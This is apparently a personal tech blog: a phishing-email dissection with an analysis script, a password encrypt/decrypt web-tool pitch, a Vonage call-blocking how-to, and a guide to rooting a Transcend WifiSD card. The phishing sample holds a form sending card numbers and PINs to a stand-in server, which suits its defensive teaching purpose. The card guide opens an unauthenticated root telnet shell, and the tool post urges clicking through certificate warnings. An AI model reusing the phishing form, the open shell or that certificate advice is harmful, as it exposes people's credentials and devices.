How to spot a phishing attempt – anatomy of a ‘phishing’ email

If you consider yourself someone who knows how to spot spam and phishing emails, you won’t learn anything new here. Others who want to learn how to spot spam or phishing mails, especially those who simply can’t resist clicking on links in their email no matter how many times they have been told not to :) read on …

Like most of you, every now and then I get a phishing mail delivered to my inbox. Gmail usually does a pretty good job of filtering spam and phishing mail; however, this particular one slipped through Gmail’s spam filter because of one of my own filters (why it slipped is outside the scope of this post). Anyway, here is a screenshot of the phishing mail we will be dissecting in this post. Apparently, Citibank all of a sudden lost everything they know about me except my email address :). You could stop right here, since it is clearly a phishing attempt, but for the purpose of this exercise, let’s continue. At a glance, to a novice email user it looks legitimate: it appears to have come from citibank.com and instructs me to download the attachment called Citibank.html. It must be important since it is from the Citibank alert service, so I should immediately download the file and double-click it, right? The first thing you need to understand is that the ‘mail from’ address (in this case alerts@citibank.com) is the easiest thing to fake. To find out where the mail really came from you need to see the full email headers, using the “show original” option. [Note: the screenshot below is from Gmail, but as far as I know all mail clients (Yahoo, Hotmail, Outlook etc.) allow you to view the ‘raw’ content of the mail, which shows all the mail headers.]

When you select ‘show original’ as shown above, you get the ‘raw’ mail content including all the mail headers (see the annotated screenshot below).

From the above screenshot, you can clearly see that Google’s mail server received this mail from decisiontreetech.com, not from citibank.com (highlighted in yellow). Does this mean decisiontreetech.com is the phishing source? The answer is no. In this case, it looks like someone at that company was infected with malware that allowed a remote attacker to hijack their email account session and send phishing mail through that company’s mail server. If you look further down you can see that a remote host in France with the IP address 62.244.93.88 initiated this message. For most of you, unless you work in the cyber crime division of a law enforcement agency, it doesn’t matter at this point who the criminal is (we will discover that shortly below): you know this is fake and you should simply delete the mail and go on with your life. Continue reading if you are interested in dissecting this mail further …

Now we are going to examine the attachment the crook wants you to download so he can collect your information. Typically, you can safely view the raw mail in your browser to see what the attachment contains and make sense of it, as long as it is not binary. In this case it is supposed to be an HTML file. However, the crook base64-encoded the content of the HTML text, so it is not easy to see what he is trying to do and where he intends to send your information (see the screenshot below).

I could just download the file and let the browser decode the base64-encoded HTML for me, or simply copy the content and decode it myself. The following screenshot shows the relevant part of the HTML file, decoded using the online decode tool at http://www.base64decode.org.

Finally, you can see they are posting your information to a web server at 69.73.182.242, which eventually mails everything to two email addresses, sammy78@iname.com and effeferegregregre@yahoo.com. There you have it.

PS: As of this writing the above server is still up and running, although the post action is no longer working.

Hope this post helped you learn how to easily spot phishing mails and protect your hard-earned money. Bottom line: if you get a mail asking for information your financial institution should already know, it’s a fake; delete it.
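The dissection above is one procedure: read the Received chain from the bottom up to find the first hop, compare it with the domain the From address claims, then undo the base64 transfer encoding of the attachment and look for where its form posts. The script below, added here and not part of the original post, automates those three checks with Python’s standard library over a constructed sample mail. The hostnames, the 198.51.100.9 / 203.0.113.45 / 192.0.2.77 addresses and the Bank.html attachment are documentation-range placeholders standing in for the values in the screenshots, not the real ones from the mail above.

```python
import base64
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr
from html.parser import HTMLParser

# Constructed sample mail (not the real one from the screenshots): hostnames and
# addresses are RFC 2606 / RFC 5737 documentation values.  The relay has been
# abused, the true first hop is 203.0.113.45, and the attachment posts to a
# stand-in collection server, mirroring the three findings of the write-up.
HTML_FORM = b"""<html><body>
<form method="POST" action="http://192.0.2.77/cgi-bin/collect.php">
Card number: <input name="card"> ATM PIN: <input name="pin"> <input type="submit">
</form></body></html>
"""

RAW_MAIL = (
    b"Received: from mail.compromised-relay.example (mail.compromised-relay.example [198.51.100.9])\r\n"
    b"        by mx.example.net with ESMTP id abc123; Sat, 3 May 2014 10:00:01 +0000\r\n"
    b"Received: from [203.0.113.45] (unknown [203.0.113.45])\r\n"
    b"        by mail.compromised-relay.example with ESMTPA; Sat, 3 May 2014 09:59:58 +0000\r\n"
    b"From: Bank Alert Service <alerts@bank.example>\r\n"
    b"To: victim@example.net\r\n"
    b"Subject: Important: verify your account\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="XYZ"\r\n'
    b"\r\n--XYZ\r\n"
    b"Content-Type: text/plain\r\n\r\n"
    b"Please open the attached form.\r\n"
    b"--XYZ\r\n"
    b'Content-Type: text/html; name="Bank.html"\r\n'
    b'Content-Disposition: attachment; filename="Bank.html"\r\n'
    b"Content-Transfer-Encoding: base64\r\n\r\n"
    + base64.encodebytes(HTML_FORM)
    + b"--XYZ--\r\n"
)

# "Received: from <host> (<comment>) by <next relay> ..." -- the parser has already unfolded the header.
RECEIVED_RE = re.compile(r"from\s+(?P<host>\S+)(?:\s+\((?P<comment>[^)]*)\))?.*?\bby\s+(?P<by>\S+)", re.S)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def received_hops(msg):
    """Received chain in header order: index 0 is the last relay, index -1 the first hop."""
    hops = []
    for header in msg.get_all("Received", []):
        m = RECEIVED_RE.search(str(header))
        if not m:
            continue
        ip = IPV4_RE.search(f"{m['host']} {m['comment'] or ''}")
        hops.append({"host": m["host"].strip("[]"), "ip": ip.group(1) if ip else None, "by": m["by"]})
    return hops


class FormActions(HTMLParser):
    """Collect every <form action=...> target in a decoded HTML attachment."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions += [value for name, value in attrs if name == "action" and value]


def attachment_form_targets(msg):
    """Undo the transfer encoding of each attachment and map file name -> form targets."""
    targets = {}
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        html = part.get_payload(decode=True).decode(part.get_content_charset() or "ascii", "replace")
        collector = FormActions()
        collector.feed(html)
        targets[part.get_filename()] = collector.actions
    return targets


def analyze(raw_mail):
    """Compare the claimed sender domain with the Received chain and list where attachments post data."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_mail)
    claimed = parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    hops = received_hops(msg)
    in_chain = any(h["host"].lower().endswith(claimed) or h["by"].lower().endswith(claimed) for h in hops)
    return {
        "claimed_domain": claimed,
        "hops": hops,
        "origin": hops[-1] if hops else None,
        "claimed_domain_in_chain": in_chain,
        "form_targets": attachment_form_targets(msg),
    }


if __name__ == "__main__":
    report = analyze(RAW_MAIL)
    print("From claims:", report["claimed_domain"], "| seen in Received chain:", report["claimed_domain_in_chain"])
    for hop in report["hops"]:
        print(f"  {hop['host']} ({hop['ip']}) -> {hop['by']}")
    print("Originating host:", report["origin"])
    print("Attachment form targets:", report["form_targets"])
```

To run it on a real message, replace RAW_MAIL with the bytes saved from “show original”; the attachment is only parsed, never rendered or executed. The chain is read from the last Received header upward because each relay prepends its own header, so the bottom one is the earliest hop the receiving side can see. Headers below a relay you do not trust can be forged by the sender, which is why the report only states whether the claimed domain appears anywhere in the chain rather than treating the bottom entry as proof.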

Access your passwords anywhere

Have you ever forgotten the password to one of your many online accounts? It happens to me all the time, so I save all my passwords to a file, encrypt it, and have a shell script to decrypt and search it and spit out the plain password whenever I don’t remember one. This is great when I am at home, where I have access to my script and my encrypted password file. However, if I don’t remember a password to a site when I am not at home, it is a problem. So I exposed a simple public interface on my web server to securely decrypt my passwords online from anywhere. Feel free to use this tool to encrypt/decrypt anything (passwords, email, or any text) and share a per-message passphrase with another person so they can decrypt the message to its original content. Don’t worry, no one will be able to read it unless you give them your passphrase. You can save the encrypted content (see a sample below) anywhere, like Google Docs, Dropbox, SkyDrive, or a USB stick, so you can easily access it anywhere. Feel free to use the tool (it is at the link below). There are many password manager tools like LastPass, KeePass etc. available freely that do similar things, but the difference is that here you control how you safeguard your encrypted file and, in addition, you have simple web access to encrypt/decrypt any arbitrary text.

encdec tool: https://selvans.net/encdec/
NOTE: my web server uses a self-signed SSL certificate, so your browser will complain; you have to click through the warning.

It is perfectly safe to store the encrypted message anywhere, as it is encrypted with the strong AES-256 cipher. Whenever you need to see the message content, all you need to remember is the passphrase you used to encrypt it. To get an idea of how it works, decrypt the sample content below using the passphrase ‘th1s 1s coo1’ (without the quotes).

b97ca8a4928db1a7M5lbEofsXXYqTrvEQXyIYBwbJgqUo8S5iUZuzUuoX370OzoeIXiEbkX1KKprK02Z7n9ocnMx1JoEeB3cJdgqBxkpO84Pq+rQrSsUcgLtOp10xZnFM40EJX9RPyLD7Gyl1yKIzZ5nuWxrKIz29R5UFel6J6ZBGKCbWRP2lVbaQPKFZLJtgUQ7Vq7sKxffUOepPoBxeCWcpNYyhthj4IQ/t1WUl8asGSH7CUp0Rje3GJIaHBSciwUDA+g4euunb4NY6Kivq3O7FCyJ8REpZgZ9TIZuUgYFV0tjMi9xdAxWR4EUsJUaG4fC+5JfFA05cGZgcEkwc9VSdLKDc6L1p3Ku3L/3dRnBSlSC1hXZM0Shsdo=

HOWTO block unwanted calls using Vonage and Google Voice

While most VoIP-based telephone service providers offer features to block annoying telemarketers and spam calls, Vonage does not provide any call-blocking feature, but I still stick with Vonage for a number of other features I really like. The following are three simple and easy steps to set up selective call blocking using a combination of Vonage and the Google Voice service. Not an elegant solution, but it does work and, most importantly, it’s free :) I have been using it successfully for a couple of years now.

Just follow the 3 steps below.

1. Get a free Google Voice number. Go to https://www.google.com/voice and follow the prompts to set it up with your home or cell phone (you should remove it later) and Google Chat as the forwarding numbers, as shown below …

Phones setting: http://selvans.net/vonage_scb/gvsettings.png
Calls setting: http://selvans.net/vonage_scb/gvcallsettings.png
Note: mine shows only Google Chat since I removed all forwarding numbers.

2. Log in to your Vonage account and set up SimulRing to ring your Google Voice number, as shown below:
Simulring: http://selvans.net/vonage_scb/simulring.png

3. Log in to your Vonage account and set up the voicemail timeout settings as shown below:
Vonage VM timeout: http://selvans.net/vonage_scb/vmtimeout.png

After this, whenever you get an unwanted call, log in to Google Voice, select History, find the unwanted number and select “block” from the pulldown menu under “more”, as shown below …
http://selvans.net/vonage_scb/gvblock.png

Note: Google does a pretty good job of blocking spam on its own… as you can see, I did not have to block this 702-815-2394 number since Google had already done that for me :)

In addition, if you have a list of numbers to block, you can follow my original post below to set up a group of numbers to block.

https://forums.vonage.com/showpost.php?p=17184&postcount=56

Enjoy!

HOWTO set up key-based ssh and scp to a Transcend WifiSD card

The following are the steps to get root and ssh access to a Transcend WifiSD card in order to automate copying files off the card. It is assumed that the user has some familiarity with Linux scripts and commands, and that the user will use a Linux host to interact with the card, although the setup can easily be used from Windows as well with tools like WinSCP, Cygwin or pscp.exe.

The setup outlined here is based on the information and code shared by the original author (Glen) at the following link/blog.
https://www.pitt-pladdy.com/blog/_20140202-083815_0000_Transcend_WiFi_SD_Hacks_CF_adaptor_telnet_custom_upload_/

DISCLAIMER: Use it at your own risk. I am not responsible for any loss or damage to your property.

STEPS:

0. Use the Transcend tools (Android app or iOS app) to configure your card to connect to your home wifi network; while you are at it, change the admin user, the card’s wifi SSID, password etc. Make sure your card successfully connects to your wireless network and note the IP address assigned to it by your home wifi router.

1. Download and extract http://selvans.net/public/custom.tar.gz on your desktop computer and edit the autorun.sh file to uncomment the line below for telnet access, i.e. remove the leading ‘#’:

   telnetd -l /bin/bash &

2. Edit the access.sh file and change the "trusted_network" variable to match your network (use straight double quotes; the shell does not accept curly ones):

   trusted_network="your_routers_ssid:your_routers_ip:your_router_mac"
   example: trusted_network="myrouterssid:192.168.1.1:ff:ff:ff:ff:ff:ff"
 
3. Insert your SD card in your computer and copy the entire custom/ directory from step #1 above to the root directory of the SD card. In addition, also copy autorun.sh to the root directory of the SD card.

4. Remove the card and reinsert it into your computer.

5. Now you should be able to telnet to your card from your Linux box. In the examples shown below 192.168.xxx.xxx is my WifiSD card and 192.168.yyy.yyy is my Ubuntu desktop:

   arul@cheetah:~$ telnet 192.168.xxx.xxx
   Trying 192.168.xxx.xxx...
   Connected to 192.168.xxx.xxx.
   Escape character is '^]'.
   # ls
   bin             home            lost+found      sbin            usr
   config_value    init            mnt             sys             var
   dev             lib             proc            tmp             www
   etc             linuxrc         root            ts_version.inc

6. Once you are logged in via telnet as shown in step #5 above, you need to create dropbear host keys and copy them to your desktop to include in the custom/ directory on the SD card. Note: I have included two dummy files in the custom/ directory; you need to replace them with your own key files, i.e. follow the example below but use your own IP address and user name, of course.
 
   # dropbearkey -t rsa -f /tmp/dropbear_rsa_host_key
   # dropbearkey -t dss -f /tmp/dropbear_dss_host_key
   # scp /tmp/dropbear_* arul@192.168.yyy.yyy:/tmp/.
 
Now copy the two files from your /tmp directory into the custom/ directory on the SD card, replacing the dummy files.

7. Create a DSA key pair on your desktop (or reuse one if you already have a DSA public key) and copy the public key to the custom/ directory as authorized_keys. Note: I have included a dummy authorized_keys file that you need to replace.

   ssh-keygen -t dsa
   cp ~/.ssh/id_dsa.pub custom/authorized_keys

8. Once you have updated all the key files in the custom/ directory on the card, unplug the card and plug it back into your device (computer or camera) one last time. Once the card boots, you should be able to ssh into your card, scp files, or set up automated scripts to copy files from the card to your desktop… and pretty much do everything you can do with ssh!
 
   example: 
   arul@cheetah:/tmp$ ssh root@192.168.xxx.xxx
   # cat /proc/cpuinfo 
   Processor : ARM926EJ-S rev 5 (v5l)
   BogoMIPS : 421.06
   Features : swp half fastmult edsp java 
   CPU implementer : 0x41
   CPU architecture: 5TEJ
   CPU variant : 0x0
   CPU part : 0x926
   CPU revision : 5

   Hardware : KeyASIC Ka2000 EVM
   Revision : 0000
   Serial : 0000000000000000
   
   # date
   Sat May  3 16:13:53 UTC 2014
   
   # /sbin/busybox-armv5l uname -a

   Linux (none) 2.6.32.28 #137 PREEMPT Fri Mar 22 18:21:52 CST 2013 armv5tejl GNU/Linux

   # exit
   Connection to 192.168.xxx.xxx closed.

   arul@cheetah:/tmp$ scp -r root@192.168.xxx.xxx:/mnt/sd/DCIM/* .
   DSCN0254.JPG                                          100%  836KB 278.8KB/s   00:03 
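Before the final unplug in step 8, it is worth checking the staging tree you are about to copy to the card: a placeholder left in access.sh or an unreplaced dummy key file only shows up later as a card that never appears on the network or an ssh login that is refused. The Python script below is an added pre-flight check, not part of custom.tar.gz or the original post. It assumes the layout described in steps 1–7 (autorun.sh beside a custom/ directory holding access.sh, the two dropbear host keys and authorized_keys); the format checks are this script’s own assumptions: dropbear key files start with the key type as a length-prefixed string, and an authorized_keys line is ‘<type> <base64 blob> [comment]’ whose blob carries the same type (ssh-dss, as step 7 generates, is accepted alongside newer types). It also flags the curly quotes that copy-pasting the example above from a web page can introduce, which the card’s shell would not accept.

```python
import base64
import re
import struct
import tempfile
from pathlib import Path

# Added pre-flight check for the staging tree from steps 1-7.  Not part of
# custom.tar.gz; the format checks below are this script's own assumptions.
PLACEHOLDER = "your_routers_ssid:your_routers_ip:your_router_mac"
# Accept straight or curly double quotes so a pasted line is still parsed, then flag the curly ones.
TRUSTED_RE = re.compile(
    r'^\s*trusted_network=["\u201c\u201d]?(?P<ssid>[^:"\u201c\u201d]+):'
    r'(?P<ip>[^:"\u201c\u201d]+):(?P<mac>[^"\u201c\u201d\s]+)["\u201c\u201d]?\s*$', re.M)
IPV4_RE = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)$")
MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256")  # ssh-dss is what step 7 makes


def check_autorun(text):
    """autorun.sh must have the telnetd line uncommented, or step 5 has no way in."""
    if any(re.match(r"^\s*telnetd\b", line) for line in text.splitlines()):
        return []
    return ["autorun.sh: 'telnetd -l /bin/bash &' is still commented out (needed for step 5)"]


def check_trusted_network(access_sh):
    """access.sh must carry a real ssid:ip:mac triple in straight quotes, not the placeholder."""
    problems = []
    if any(ch in access_sh for ch in "\u201c\u201d"):
        problems.append("access.sh: curly quotes found; the shell needs straight double quotes")
    m = TRUSTED_RE.search(access_sh)
    if not m:
        return problems + ['access.sh: no trusted_network="ssid:ip:mac" line found']
    if f"{m['ssid']}:{m['ip']}:{m['mac']}" == PLACEHOLDER:
        return problems + ["access.sh: trusted_network still holds the placeholder value"]
    if not IPV4_RE.match(m["ip"]):
        problems.append(f"access.sh: router IP {m['ip']!r} is not a valid IPv4 address")
    if not MAC_RE.match(m["mac"]):
        problems.append(f"access.sh: router MAC {m['mac']!r} is not in aa:bb:cc:dd:ee:ff form")
    return problems


def check_dropbear_key(path, key_type):
    """A dropbear key file begins with its key type as a length-prefixed string (assumed here)."""
    if not path.is_file() or path.stat().st_size == 0:
        return [f"{path.name}: missing or empty"]
    expected = struct.pack(">I", len(key_type)) + key_type.encode()
    if not path.read_bytes().startswith(expected):
        return [f"{path.name}: does not start like a dropbear {key_type} key (dummy file not replaced?)"]
    return []


def check_authorized_keys(text):
    """Each key line is '<type> <base64 blob> [comment]'; the blob's own type field must match."""
    problems, usable = [], 0
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if len(fields) < 2 or fields[0] not in KEY_TYPES:
            problems.append(f"authorized_keys:{n}: expected '<type> <base64> [comment]'")
            continue
        try:
            blob = base64.b64decode(fields[1], validate=True)
        except ValueError:
            problems.append(f"authorized_keys:{n}: key data is not valid base64")
            continue
        tlen = struct.unpack(">I", blob[:4])[0] if len(blob) >= 4 else 0
        if blob[4:4 + tlen] != fields[0].encode():
            problems.append(f"authorized_keys:{n}: blob type does not match {fields[0]}")
            continue
        usable += 1
    if not usable:
        problems.append("authorized_keys: no usable public key (dummy file not replaced?)")
    return problems


def preflight(root):
    """Check the tree step 3 copies to the card: autorun.sh at the root, the rest under custom/."""
    root = Path(root)
    custom = root / "custom"
    autorun, access, ak = root / "autorun.sh", custom / "access.sh", custom / "authorized_keys"
    problems = check_autorun(autorun.read_text()) if autorun.is_file() else ["autorun.sh: missing"]
    problems += check_trusted_network(access.read_text()) if access.is_file() else ["custom/access.sh: missing"]
    problems += check_dropbear_key(custom / "dropbear_rsa_host_key", "ssh-rsa")
    problems += check_dropbear_key(custom / "dropbear_dss_host_key", "ssh-dss")
    problems += check_authorized_keys(ak.read_text()) if ak.is_file() else ["custom/authorized_keys: missing"]
    return problems


def sample_pubkey():
    """Constructed ssh-ed25519 public key line: 32 pattern bytes, not a real key."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(range(32))
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " demo@desktop\n"


def run_demo():
    """Build a finished staging tree and a half-finished one in a temp dir; return both problem lists."""
    with tempfile.TemporaryDirectory() as tmp:
        good, bad = Path(tmp, "good"), Path(tmp, "bad")
        for root in (good, bad):
            (root / "custom").mkdir(parents=True)
        (good / "autorun.sh").write_text("#!/bin/sh\ntelnetd -l /bin/bash &\n")
        (good / "custom/access.sh").write_text('trusted_network="myrouterssid:192.168.1.1:ff:ff:ff:ff:ff:ff"\n')
        for name, ktype in (("dropbear_rsa_host_key", b"ssh-rsa"), ("dropbear_dss_host_key", b"ssh-dss")):
            # constructed stand-in carrying only the header a dropbear key file starts with
            (good / "custom" / name).write_bytes(struct.pack(">I", len(ktype)) + ktype + bytes(16))
        (good / "custom/authorized_keys").write_text(sample_pubkey())
        (bad / "autorun.sh").write_text("#!/bin/sh\n#telnetd -l /bin/bash &\n")
        (bad / "custom/access.sh").write_text("trusted_network=\u201c" + PLACEHOLDER + "\u201d\n")
        (bad / "custom/authorized_keys").write_text("dummy\n")
        return preflight(good), preflight(bad)


if __name__ == "__main__":
    finished, unfinished = run_demo()
    print("finished tree:", finished or "OK")
    print("unfinished tree:", *unfinished, sep="\n  ")
```

Point preflight() at the directory you extracted custom.tar.gz into (after steps 1, 2, 6 and 7) and copy to the card only when it returns an empty list; run_demo() shows the output on a correctly prepared tree and on one where the placeholders and dummy files were left in place.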

Have fun with ssh/scp on your Transcend WifiSD card!

TOOLS:
   This is where I got the prebuilt busybox and dropbear binaries, for reference. They are already in the custom/ directory for convenience.
   arm5l busybox: http://busybox.net/downloads/binaries/latest/
   arm5l dropbear: http://landley.net/aboriginal/about.html